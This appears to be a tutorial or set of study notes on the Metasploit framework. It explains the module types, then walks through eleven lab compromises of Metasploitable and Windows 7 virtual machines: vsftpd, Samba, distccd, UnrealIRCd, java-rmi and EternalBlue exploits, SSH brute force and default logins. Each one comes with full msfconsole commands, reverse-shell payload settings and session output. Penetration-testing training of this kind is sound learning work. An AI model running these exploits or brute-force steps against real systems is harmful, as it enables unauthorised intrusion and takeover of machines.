• path to metasplot framework: cd /usr/share/metasploit-framework/

7 Modules metasploit framework contains:

  • exploits (buffer overflow, code injection, web application)
  • auxiliary (does not execute a payload as an explot module does, but istead it is used to perform different actions such as scanning, fuzzing or denial of service attack. Information gateringand, fingerprinting, scanning )
  • post (used as the name, after exploiting the target, gather or steal information from target device: files, saved passwords, dumping hashes, enummerationg services and applications on the target)
  • payloads (deliver to the target with and exploit in order to control the machine: singles are payloads that are completly stand alone | stagers are estting up a network connection between the attacker and the victim, are small and reliable (bind or reverse (almost all the time we will use reverse tcp) ) | stages are payload components that are downloaded by stagers modules, can provide advanced features with no size limit example: meterpreters shells (mallware, trojan or virus) that can download files, upload files, record microphone, run webcam, take screenshots, etc)
  • encoders (helps evade antivirus detection)
  • evasion (similat ro encoders, mainly designed to evade windows defender)
  • nops (no-operation is an instruction for the processor to do nothing, useful in buffer overflow to allocate a lot of space in memory before the payload executes)

msfconsole and msfvenom

To run metasplot framework simply run msfconsole in the terminal

  • use show payloads command to list all the payloads

  • to use a certain exploit use the command: use followed by the name of the module, example: msf6 > use payload/windows/x64/shell/bind_tcp_rc4
  • use show info to get more details about what the particular module exploit can do
  • use show options to understand what the module needs to function
  • use set <parameter name> example LHOST to change the default already configured IP address
  • using show payloads again will now not list again all the payloads but rather just the ones that are compatible with the ceratl selected explot
  • use set payload <payload name> t change the default selected payload with another one you have chosen
  • use show targets to get a full list of targets that we can exploit using this attack
  • use set target 3 to select the 3rd option listed by running the command above
  • use exploit to enable/run the exploit

Example 1 – vsftpd 2.3.4

  • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
  • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
  • let’s choose the FTP port: 21/tcp open ftp vsftpd 2.3.4
  • the goal is to find an explot if this software is vulnerable
  • as an initial action, before google-ing for possible exploits, you can use metasploit framework
  • on terminal2: run $ searchsploit vsftpd 2.3.4
  • on terminal3: run msfconsole and then type: msf6 > search vsftpd
  • msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info
  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.222.127
  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
  • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show targets

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.222.127:21 – Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.222.127:21 – USER: 331 Please specify the password.
[+] 192.168.222.127:21 – Backdoor service has been spawned, handling…
[+] 192.168.222.127:21 – UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.222.127:6200) at 2021-08-18 17:39:36 -0400

whoami
root
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:e1:70:b1
inet addr:192.168.222.127 Bcast:192.168.222.2 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fee1:70b1/64 Scope:Link

  • to exit a shell just type: exit

exit
[*] 192.168.222.127 – Command shell session 1 closed.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

 

Example 2 – Misconfiguration bindshell

  • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
  • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
  • let’s choose the 1524/tcp open bindshell Metasploitable root shell
  • on terminal2 let’s use a tool called: netcat (a program used to extablish network connections with other machines using both tcp and udp)
  • to check the help menu run: (mrhacker㉿kali)-[~/Desktop] nc -h
    [v1.10-46]
    connect to somewhere: nc [-options] hostname port[s] [ports] …
    listen for inbound: nc -l -p port [-options] [hostname] [port]
  • to use it run:

┌──(mrhacker㉿kali)-[~/Desktop]
└─$ nc 192.168.222.127 1524
root@metasploitable:/#

 

Example 3- telnet

  • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
  • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
  • let’s choose the 23/tcp open telnet Linux telnetd
  • on terminal2: run $ searchsploit Linux telnetd | no real helpful results found
  • let’s try the default login and username: telnet 192.168.222.127

┌──(mrhacker㉿kali)-[~]
└─$ telnet 192.168.222.127
Trying 192.168.222.127…
Connected to 192.168.222.127.
Escape character is ‘^]’.
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|

Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started

metasploitable login: msfadmin
Password:
Last login: Wed Aug 18 17:19:18 EDT 2021 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ sudo su
[sudo] password for msfadmin:
root@metasploitable:/home/msfadmin# whoami
root
root@metasploitable:/home/msfadmin#

 

Example 4- Samba

  • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
  • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
  • let’s choose the 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
  • and this one: 445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
  • on terminal2: run $ searchsploit Samba | too many results, we need to narrow it down
  • on terminal3: run $ msfconsole | and then run: msf6 > search samba | some results, but not the ones that we are looking for
  • let’s then try: msf6 > use auxiliary/scanner/smb/ and try this module: 12 auxiliary/scanner/smb/smb_version
  • msf6 auxiliary(scanner/smb/smb_version) > show info
  • msf6 auxiliary(scanner/smb/smb_version) > show options
  • msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.222.127
  • msf6 auxiliary(scanner/smb/smb_version) > exploit
  • valuable output identified: [*] 192.168.222.127:445 – Host could not be identified: Unix (Samba 3.0.20-Debian)
  • on terminal2: run $ searchsploit Samba 3.0.20 | excluding all the txt files and the py files we are left with only one valid option: Samba 3.0.20 < 3.0.25rc3 – ‘Username’ map script’ Command Execution (Metasploit)  – unix/remote/16320.rb
  • on terminal2: run $ search Samba | now we know that we are interested in: 8 exploit/multi/samba/usermap_script
  • msf6 > use exploit/multi/samba/usermap_script
  • msf6 exploit(multi/samba/usermap_script) > show info
  • msf6 exploit(multi/samba/usermap_script) > show options
  • msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.222.127
    RHOSTS => 192.168.222.127
    msf6 exploit(multi/samba/usermap_script) > run[*] Started reverse TCP handler on 192.168.222.59:4444
    [*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:34804) at 2021-08-19 05:29:39 -0400whoami
    root

Example 5- Buteforce SSH Attack

  • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
  • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
  • let’s choose this one again: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
  • on terminal2: msf6 > search ssh | out of the long list let’s select this one: 45 auxiliary/scanner/ssh/ssh_login
  • msf6 > use auxiliary/scanner/ssh/ssh_login
  • on terminal3: /home/mrhacker/Desktop/ nano usernames.txt | type inside a few possile usernames but also containing the corect one: admin, root, toor, user123, msfadmin, admin123 | one per line
  • on terminal3: /home/mrhacker/Desktop/ nano passwords.txt | type inside a few possile usernames but also containing the corect one: password, password123, helloworld, msfadmin, test1234 | one per line
  • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/mrhacker/Desktop/passwords.txt
    PASS_FILE => /home/mrhacker/Desktop/passwords.txt
  • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /home/mrhacker/Desktop/usernames.txt
    USER_FILE => /home/mrhacker/Desktop/usernames.txt
  • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.222.127
    RHOSTS => 192.168.222.127
  • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
    VERBOSE => true
  • msf6 auxiliary(scanner/ssh/ssh_login) > exploit
  • [+] 192.168.222.127:22 – Success: ‘msfadmin:msfadmin’ ‘uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ‘
    [*] Command shell session 1 opened (192.168.222.59:33103 -> 192.168.222.127:22) at 2021-08-19 06:29:09 -0400
    [-] 192.168.222.127:22 – Failed: ‘admin123:password’
  • msf6 auxiliary(scanner/ssh/ssh_login) > sessions
  • msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
    [*] Starting interaction with 1…whoami
    msfadmin
    sudo su
    [sudo] password for msfadmin: msfadminwhoami
    root
  • as we now have the username and passowrd we could ssh into the machine using the discuvered username and password: msfadmin/msfadmin
  • ┌──(mrhacker㉿kali)-[~]
    └─$ ssh msfadmin@192.168.222.127
    msfadmin@192.168.222.127’s password:
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

 

Example 6 – distccd

  • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
  • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
  • let’s try this one: 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
  • on terminal2: msfconsole and the run: msf6 > search distc  | only one record found: exploit/unix/misc/distcc_exec
  • msf6 > use exploit/unix/misc/distcc_exec
  • msf6 exploit(unix/misc/distcc_exec) > show options
  • msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.222.127 (remote host)
  • msf6 exploit(unix/misc/distcc_exec) > show payloads
  • msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
    payload => cmd/unix/reverse
  • msf6 exploit(unix/misc/distcc_exec) > set LHOST 192.168.222.59 (listenig host)
    LHOST => 192.168.222.59
  • msf6 exploit(unix/misc/distcc_exec) > exploit[*] Started reverse TCP double handler on 192.168.222.59:4444
    [*] Accepted the first client connection…
    [*] Accepted the second client connection…
    [*] Command: echo 9JUz23ZkTBY4MuQx;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets…
    [*] Reading from socket B
    [*] B: “9JUz23ZkTBY4MuQx\r\n”
    [*] Matching…
    [*] A is input…
    [*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:50819) at 2021-08-19 10:37:49 -0400whoami
    daemon
    hostname
    metasploitable
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Example 7 – distccd

  • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
  • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
  • let’s try these ones: 6667/tcp open irc UnrealIRCd | 6697/tcp open irc UnrealIRCd
  • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit irc | too many findings
  • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit UnrealIRCd | just 4 findings, and only one Ruby: UnrealIRCd 3.2.8.1 – Backdoor Command Execution (Metasploit) linux/remote/16922.rb
  • on terminal3: msfconsole and the run: msf6 > search UnrealIRCd
  • msf6 > use 0
  • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
  • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.222.127
    RHOSTS => 192.168.222.127
  • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
  • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
    payload => cmd/unix/reverse
  • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show info
  • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
  • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > ifconfig
  • eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
    inet 192.168.222.59 netmask 255.255.255.0 broadcast 192.168.222.255
  • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.222.59
    LHOST => 192.168.222.59
  • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit[*] Started reverse TCP double handler on 192.168.222.59:4444
    [*] 192.168.222.127:6667 – Connected to 192.168.222.127:6667…
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
    [*] 192.168.222.127:6667 – Sending backdoor command…
    [*] Accepted the first client connection…
    [*] Accepted the second client connection…
    [*] Command: echo FtAIdHWFZQ9qDwWD;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets…
    [*] Reading from socket B
    [*] B: “FtAIdHWFZQ9qDwWD\r\n”
    [*] Matching…
    [*] A is input…
    [*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:44450) at 2021-08-19 10:52:15 -0400whoami
    roothostname
    metasploitable
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

 

Example 8 – drb

  • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
  • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
  • let’s try this one : 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
  • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit drb | too many findings
  • on terminal3: msfconsole and the run: msf6 > search drb
  • msf6 > use exploit/linux/misc/drb_remote_codeexec
  • (this ruby file was removed from kali-linux-2021.2 | still available in kali-linux-2020.2)

Example 9 – vnc

  • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
  • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
  • let’s try this one : 5900/tcp open vnc VNC (protocol 3.3)
  • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit vnc | too many findings
  • on terminal3: msfconsole and the run: msf6 > search vnc
  • this one looks interesting: exploit/multi/vnc/vnc_keyboard_exec | but the payload is one for Windows and it will not work
  • let’s try to connect to VNC on the target machine:
  • (mrhacker㉿kali)-[~/Desktop] $ vncviewer 192.168.222.127
    Connected to RFB server, using protocol version 3.3
    Performing standard VNC authentication
    Password: password | the password was password
    Authentication successful

Example 10- java-rmi

  • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
  • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
  • let’s try this one : 1099/tcp open java-rmi GNU Classpath grmiregistry
  • on terminal2: msfconsole and the run: msf6 > search java rmi
  • msf6 > use exploit/multi/misc/java_rmi_server
    [*] No payload configured, defaulting to java/meterpreter/reverse_tcp
  • msf6 exploit(multi/misc/java_rmi_server) > show options
  • msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.222.127
  • msf6 exploit(multi/misc/java_rmi_server) > run
  • msf6 exploit(multi/misc/java_rmi_server) > show sessions
  • msf6 exploit(multi/misc/java_rmi_server) > sessions -i 1
  • meterpreter > help
  • meterpreter > shell
    Process 1 created.
    Channel 1 created.
    whoami
    root

Example 11 – Windows 7 x64 – Eternalblue NSA-developed Explot

  • check the IP address of the Windows 7 x64 virtual machine ipconfig: 192.168.222.205
  • on terminal1: run sudo nmap -sS 192.168.222.205
  • let’s try these ones: 139/tcp open netbios-ssn and 445/tcp open microsoft-ds
  • on terminal2: msfconsole and then run msf6 > search eternalblue
  • let’s use this one to test if the target is vulnerable: “auxiliary/scanner/smb/smb_ms17_010”
  • msf6 > use 4
  • msf6 auxiliary(scanner/smb/smb_ms17_010) > show info
  • msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
  • msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.222.205RHOSTS => 192.168.222.205
    msf6 auxiliary(scanner/smb/smb_ms17_010) >[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
    [*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/smb/smb_ms17_010) >
  • on terminal2: msfconsole and then run msf6 > search eternalblue
  • let’s use this one to test if the target is vulnerable: “exploit/windows/smb/ms17_010_eternalblue”
  • msf6 > use 0
  • msf6 exploit(windows/smb/ms17_010_eternalblue) > show info
  • msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
  • msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.222.205
    RHOSTS => 192.168.222.205
    msf6 exploit(windows/smb/ms17_010_eternalblue) > run[*] Started reverse TCP handler on 192.168.222.59:4444
    [*] 192.168.222.205:445 – Executing automatic check (disable AutoCheck to override)
    [*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
    [+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
    [*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
    [+] 192.168.222.205:445 – The target is vulnerable.
    [*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
    [+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
    [*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
    [*] 192.168.222.205:445 – Connecting to target for exploitation.
    [+] 192.168.222.205:445 – Connection established for exploitation.
    [+] 192.168.222.205:445 – Target OS selected valid for OS indicated by SMB reply
    [*] 192.168.222.205:445 – CORE raw buffer dump (38 bytes)
    [*] 192.168.222.205:445 – 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
    [*] 192.168.222.205:445 – 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
    [*] 192.168.222.205:445 – 0x00000020 50 61 63 6b 20 31 Pack 1
    [+] 192.168.222.205:445 – Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 192.168.222.205:445 – Trying exploit with 12 Groom Allocations.
    [*] 192.168.222.205:445 – Sending all but last fragment of exploit packet
    [*] 192.168.222.205:445 – Starting non-paged pool grooming
    [+] 192.168.222.205:445 – Sending SMBv2 buffers
    [+] 192.168.222.205:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 192.168.222.205:445 – Sending final SMBv2 buffers.
    [*] 192.168.222.205:445 – Sending last fragment of exploit packet!
    [*] 192.168.222.205:445 – Receiving response from exploit packet
    [+] 192.168.222.205:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 192.168.222.205:445 – Sending egg to corrupted connection.
    [*] 192.168.222.205:445 – Triggering free of corrupted buffer.
    [*] Sending stage (200262 bytes) to 192.168.222.205
    [+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [*] Meterpreter session 1 opened (192.168.222.59:4444 -> 192.168.222.205:49166) at 2021-08-19 12:33:18 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > help

meterpreter > screenshot
Screenshot saved to: /home/mrhacker/Desktop/OvtUHTeu.jpeg
meterpreter >